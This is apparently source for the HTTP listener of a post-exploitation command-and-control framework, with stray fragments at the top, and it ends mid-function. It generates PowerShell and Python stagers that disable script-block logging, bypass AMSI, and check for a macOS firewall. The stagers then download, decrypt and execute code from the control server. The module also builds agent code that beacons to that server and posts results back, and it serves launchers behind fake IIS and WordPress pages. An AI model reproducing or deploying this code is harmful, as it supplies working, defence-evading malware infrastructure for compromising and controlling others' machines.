args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() def shutdown(self, name=''): """ Terminates the server thread stored in the self.threads dictionary, keyed by the listener name. """ if name and name != '': print helpers.color("[!] Killing listener '%s'" % (name)) self.threads[name].kill() else: print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) self.threads[self.options['Name']['Value']].kill() def generate_cookie(self): """ Generate Cookie """ chars = string.letters cookie = helpers.random_string(random.randint(6,16), charset=chars) return cookie
49.755538
495
0.519677
import logging import base64 import sys import random import string import os import ssl import time import copy import json import sys from pydispatch import dispatcher from flask import Flask, request, make_response, send_from_directory from lib.common import helpers from lib.common import agents from lib.common import encryption from lib.common import packets from lib.common import messages from lib.common import templating from lib.common import obfuscation class Listener: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'HTTP[S]', 'Author': ['@harmj0y'], 'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'), 'Category' : ('client_server'), 'Comments': [] } self.options = { 'Name' : { 'Description' : 'Name for the listener.', 'Required' : True, 'Value' : 'http' }, 'Host' : { 'Description' : 'Hostname/IP for staging.', 'Required' : True, 'Value' : "http://%s" % (helpers.lhost()) }, 'BindIP' : { 'Description' : 'The IP to bind to on the control server.', 'Required' : True, 'Value' : '0.0.0.0' }, 'Port' : { 'Description' : 'Port for the listener.', 'Required' : True, 'Value' : '' }, 'Launcher' : { 'Description' : 'Launcher string.', 'Required' : True, 'Value' : 'POWerShell.EXe -wIndO 1 -stA -noPrO -enc ' }, 'StagingKey' : { 'Description' : 'Staging key for initial agent negotiation.', 'Required' : True, 'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa' }, 'DefaultDelay' : { 'Description' : 'Agent delay/reach back interval (in seconds).', 'Required' : True, 'Value' : 5 }, 'DefaultJitter' : { 'Description' : 'Jitter in agent reachback interval (0.0-1.0).', 'Required' : True, 'Value' : 0.0 }, 'DefaultLostLimit' : { 'Description' : 'Number of missed checkins before exiting', 'Required' : True, 'Value' : 60 }, 'DefaultProfile' : { 'Description' : 'Default communication profile for the agent.', 'Required' : True, 'Value' : "/blog/,/wp-admin/login/,/brewery/,/shop?q=2341fdsar3qqa,/wp-content/plugins/square-sync/square-sync.css?ver=0.1,/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.5.3|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate" }, 'CertPath' : { 'Description' : 'Certificate path for https listeners.', 'Required' : False, 'Value' : '' }, 'KillDate' : { 'Description' : 'Date for the listener to exit (MM/dd/yyyy).', 'Required' : False, 'Value' : '' }, 'WorkingHours' : { 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' }, 'Headers' : { 'Description' : 'Headers for the control server.', 'Required' : True, 'Value' : 'Server:Microsoft-IIS/10' }, 'Cookie' : { 'Description' : 'Custom Cookie Name', 'Required' : False, 'Value' : '' }, 'StagerURI' : { 'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php', 'Required' : False, 'Value' : '/download/wp-content/uploads/brewery.svg' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'SlackToken' : { 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', 'Required' : False, 'Value' : '' }, 'SlackChannel' : { 'Description' : 'The Slack channel or DM that notifications will be sent to.', 'Required' : False, 'Value' : '#general' } } self.mainMenu = mainMenu self.threads = {} self.app = None self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0]) self.header_offset = random.randint(0, 64) self.session_cookie = '' if self.session_cookie == '': self.options['Cookie']['Value'] = self.generate_cookie() def default_response(self): """ Returns an IIS 7.5 404 not found page. """ return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>', '<title>404 - File or directory not found.</title>', '<style type="text/css">', '<!--', 'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}', 'fieldset{padding:0 15px 10px 15px;}', 'h1{font-size:2.4em;margin:0;color:#FFF;}', 'h2{font-size:1.7em;margin:0;color:#CC0000;}', 'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}', '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;', 'background-color:#555555;}', '#content{margin:0 0 0 2%;position:relative;}', '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}', '-->', '</style>', '</head>', '<body>', '<div id="header"><h1>Server Error</h1></div>', '<div id="content">', ' <div class="content-container"><fieldset>', ' <h2>404 - File or directory not found.</h2>', ' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>', ' </fieldset></div>', '</div>', '</body>', '</html>', ' ' * self.header_offset, ]) def index_page(self): """ Returns a default HTTP server page. """ return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />', '<title>IIS7</title>', '<style type="text/css">', '<!--', 'body {', ' color:#000000;', ' background-color:#B3B3B3;', ' margin:0;', '}', '', '#container {', ' margin-left:auto;', ' margin-right:auto;', ' text-align:center;', ' }', '', 'a img {', ' border:none;', '}', '', '-->', '</style>', '</head>', '<body>', '<div id="container">', '<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>', '</div>', '</body>', '</html>', ]) def validate_options(self): """ Validate all options for this listener. """ self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] for key in self.options: if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''): print helpers.color("[!] Option \"%s\" is required." % (key)) return False if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '': print helpers.color("[!] HTTPS selected but no CertPath specified.") return False return True def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): """ Generate a basic launcher for the specified listener. """ if not language: print helpers.color('[!] listeners/http generate_launcher(): no language specified!') if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options'] host = listenerOptions['Host']['Value'] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] profile = listenerOptions['DefaultProfile']['Value'] uris = [a for a in profile.split('|')[0].split(',')] stage0 = random.choice(uris) customHeaders = profile.split('|')[2:] cookie = listenerOptions['Cookie']['Value'] # generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners if cookie == '': generate = self.generate_cookie() listenerOptions['Cookie']['Value'] = generate cookie = generate if language.startswith('po'): # PowerShell stager = '$ErrorActionPreference = \"SilentlyContinue\";' if safeChecks.lower() == 'true': stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") # ScriptBlock Logging bypass stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add") stager += "('EnableScriptB'+'lockLogging',0);" stager += helpers.randomize_capitalization("$val.Add") stager += "('EnableScriptBlockInvocationLogging',0);" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("=$val}") stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") stager += "'signatures','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}};") # AMSI bypass stager += '$p6="iInitFai";$p1="System.Management";$p5="ams";$p4="iUtils";$p7="led";$p3="on.Ams";$p8="NonPub";$p9="lic,Stat";' stager += '$p10="ic";$p11=$null;$p12=$true;$p2=".Automati";[Ref].Assembly.GetType($p1+$p2+$p3+$p4).GetField($p5+$p6+$p7,$p8+$p9+$p10)' stager += '.SetValue($p11,$p12);' stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name("wc") + "= New-Object System.Net.WebClient;") if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] stager += "$u='"+userAgent+"';" if 'https' in host: # allow for self-signed certificates for https connections stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" if userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$' + helpers.generate_random_script_var_name("wc") + '.Headers.Add(') stager += "'User-Agent',$u);" if userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(') stager += "'User-Agent',$u);" if proxy.lower() != 'none': if proxy.lower() == 'default': stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;") else: # TODO: implement form for other proxy stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('") stager += proxy.lower() stager += helpers.randomize_capitalization("');") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;") if proxyCreds.lower() != 'none': if proxyCreds.lower() == "default": stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;") else: # TODO: implement form for other proxy credentials username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] if len(username.split('\\')) > 1: usr = username.split('\\')[1] domain = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" else: usr = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;") #save the proxy settings to use during the entire staging process and the agent stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;" # TODO: reimplement stager retries? #check if we're using IPv6 listenerOptions = copy.deepcopy(listenerOptions) bindIP = listenerOptions['BindIP']['Value'] port = listenerOptions['Port']['Value'] if ':' in bindIP: if "http" in host: if "https" in host: host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) else: host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += "'%s');" % (stagingKey) stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};') routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';" if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] if headerKey.lower() == "host": stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket) stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);") stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];") stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") if obfuscate: stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand) if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())): return helpers.powershell_launcher(stager, launcher) else: return stager if language.startswith('py'): launcherBase = 'import sys;' if "https" in host: launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" try: if safeChecks.lower() == 'true': launcherBase += "import re, subprocess;" launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n" launcherBase += "out, err = ps.communicate()\n" launcherBase += "if re.search(\"Little Snitch\", out):\n" launcherBase += " sys.exit()\n" except Exception as e: p = "[!] Error setting LittleSnitch in stager: " + str(e) print helpers.color(p, color='red') if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] launcherBase += "import urllib2;\n" launcherBase += "UA='%s';" % (userAgent) launcherBase += "server='%s';t='%s';" % (host, stage0) routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) launcherBase += "req=urllib2.Request(server+t);\n" launcherBase += "req.add_header('User-Agent',UA);\n" launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket) if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib2.ProxyHandler();\n" else: proto = proxy.split(':')[0] launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n" if proxyCreds != "none": if proxyCreds == "default": launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "o = urllib2.build_opener();\n" launcherBase += "urllib2.install_opener(o);\n" launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "IV=a[0:4];" launcherBase += "data=a[4:];" launcherBase += "key=IV+'%s';" % (stagingKey) launcherBase += "S,j,out=range(256),0,[]\n" launcherBase += "for i in range(256):\n" launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += "i=j=0\n" launcherBase += "for char in data:\n" launcherBase += " i=(i+1)%256\n" launcherBase += " j=(j+S[i])%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" launcherBase += "exec(''.join(out))" if encode: launchEncoded = base64.b64encode(launcherBase) launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded) return launcher else: return launcherBase else: print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!") def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None): """ Generate the stager code needed for communications with this listener. """ if not language: print helpers.color('[!] listeners/http generate_stager(): no language specified!') return None profile = listenerOptions['DefaultProfile']['Value'] uris = [a.strip('/') for a in profile.split('|')[0].split(',')] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] killDate = listenerOptions['KillDate']['Value'] host = listenerOptions['Host']['Value'] customHeaders = profile.split('|')[2:] stage1 = random.choice(uris) stage2 = random.choice(uris) if language.lower() == 'powershell': f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) stager = f.read() f.close() if not host.endswith("/"): host += "/" remove = [] if customHeaders != []: for key in customHeaders: value = key.split(":") if 'cookie' in value[0].lower() and value[1]: continue remove += value headers = ','.join(remove) stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";") if workingHours != "": stager = stager.replace('WORKING_HOURS_REPLACE', workingHours) if killDate != "": stager = stager.replace('REPLACE_KILLDATE', killDate) stager = stager.replace('REPLACE_SERVER', host) stager = stager.replace('REPLACE_STAGING_KEY', stagingKey) stager = stager.replace('index.jsp', stage1) stager = stager.replace('index.php', stage2) randomizedStager = '' for line in stager.split("\n"): line = line.strip() if not line.startswith("#"): if "\"" not in line: randomizedStager += helpers.randomize_capitalization(line) else: randomizedStager += line if obfuscate: randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) elif encrypt: RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager) else: # otherwise just return the case-randomized stager return randomizedStager elif language.lower() == 'python': template_path = [ os.path.join(self.mainMenu.installPath, '/data/agent/stagers'), os.path.join(self.mainMenu.installPath, './data/agent/stagers')] eng = templating.TemplateEngine(template_path) template = eng.get_template('http.py') template_options = { 'working_hours': workingHours, 'kill_date': killDate, 'staging_key': stagingKey, 'profile': profile, 'stage_1': stage1, 'stage_2': stage2 } stager = template.render(template_options) stager = obfuscation.py_minify(stager) # base64 encode the stager and return it if encode: return base64.b64encode(stager) if encrypt: # return an encrypted version of the stager ("normal" staging) RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, stager) else: # otherwise return the standard stager return stager else: print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""): """ Generate the full agent code needed for communications with this listener. """ if not language: print helpers.color('[!] listeners/http generate_agent(): no language specified!') return None language = language.lower() delay = listenerOptions['DefaultDelay']['Value'] jitter = listenerOptions['DefaultJitter']['Value'] profile = listenerOptions['DefaultProfile']['Value'] lostLimit = listenerOptions['DefaultLostLimit']['Value'] killDate = listenerOptions['KillDate']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] b64DefaultResponse = base64.b64encode(self.default_response()) if language == 'powershell': f = open(self.mainMenu.installPath + "./data/agent/agent.ps1") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_powershell_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay)) code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter)) code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"") code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit)) code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"') # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code elif language == 'python': f = open(self.mainMenu.installPath + "./data/agent/agent.py") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_python_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit)) code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse)) # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate)) if workingHours != "": code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate)) return code else: print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. """ if language: if language.lower() == 'powershell': updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" getTask = """ $script:GetTask = { try { if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) { # meta 'TASKING_REQUEST' : 4 $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4 $RoutingCookie = [Convert]::ToBase64String($RoutingPacket) # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + self.session_cookie + """=$RoutingCookie") # choose a random valid URI for checkin $taskURI = $script:TaskURIs | Get-Random $result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI) $result } } catch [Net.WebException] { $script:MissedCheckins += 1 if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } """ sendMessage = """ $script:SendMessage = { param($Packets) if($Packets) { # build and encrypt the response packet $EncBytes = Encrypt-Bytes $Packets # build the top level RC4 "routing packet" # meta 'RESULT_POST' : 5 $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5 if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) { # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent) $Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} try { # get a random posting URI $taskURI = $Script:TaskURIs | Get-Random $response = $"""+helpers.generate_random_script_var_name("wc")+""".UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket); } catch [System.Net.WebException]{ # exception posting data... if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } } } """ return updateServers + getTask + sendMessage elif language.lower() == 'python': updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None" sendMessage = """ def send_message(packets=None): # Requests a tasking or posts data to a randomized tasking URI. # If packets == None, the agent GETs a tasking from the control server. # If packets != None, the agent encrypts the passed packets and # POSTs the data to the control server. global missedCheckins global server global headers global taskURIs data = None if packets: data = ''.join(packets) # aes_encrypt_then_hmac is in stager.py encData = aes_encrypt_then_hmac(key, data) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) else: # if we're GETing taskings, then build the routing packet to stuff info a cookie first. # meta TASKING_REQUEST = 4 routingPacket = build_routing_packet(stagingKey, sessionID, meta=4) b64routingPacket = base64.b64encode(routingPacket) headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket) taskURI = random.sample(taskURIs, 1)[0] requestUri = server + taskURI try: data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() return ('200', data) except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 #if signaled for restaging, exit. if HTTPError.code == 401: sys.exit(0) return (HTTPError.code, '') except urllib2.URLError as URLerror: # if the server cannot be reached missedCheckins = missedCheckins + 1 return (URLerror.reason, '') return ('', '') """ return updateServers + sendMessage else: print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color('[!] listeners/http generate_comms(): no language specified!') def start_server(self, listenerOptions): """ Threaded function that actually starts up the Flask server. """ # make a copy of the currently set listener options for later stager/agent generation listenerOptions = copy.deepcopy(listenerOptions) # suppress the normal Flask output log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) bindIP = listenerOptions['BindIP']['Value'] host = listenerOptions['Host']['Value'] port = listenerOptions['Port']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] stagerURI = listenerOptions['StagerURI']['Value'] userAgent = self.options['UserAgent']['Value'] listenerName = self.options['Name']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] app = Flask(__name__) self.app = app @app.route('/download/<stager>') def send_stager(stager): if 'po' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher elif 'py' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher else: return make_response(self.default_response(), 404) @app.route('/wp-admin/<domain>/<username>/<hostname>', methods=['GET']) def check_agent(domain,username,hostname): """ Check if an active agent already exists for a particular user, on a particular host. """ username = domain + "\\" + username result = self.mainMenu.agents.get_agents_by_username_host(username, hostname) if result: # Powershell base64 encoded command: "exit;" return "ZQB4AGkAdAA7AAoA" else: launcher = self.mainMenu.stagers.generate_launcher(listenerName,language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) launcher = helpers.enc_powershell(launcher) return launcher @app.before_request def check_ip(): """ Before every request, check if the IP address is allowed. """ if not self.mainMenu.agents.is_ip_allowed(request.remote_addr): listenerName = self.options['Name']['Value'] message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) @app.after_request def change_header(response): "Modify the headers response server." headers = listenerOptions['Headers']['Value'] for key in headers.split("|"): value = key.split(":") response.headers[value[0]] = value[1] return response @app.after_request def add_proxy_headers(response): "Add HTTP headers to avoid proxy caching." response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate" response.headers['Pragma'] = 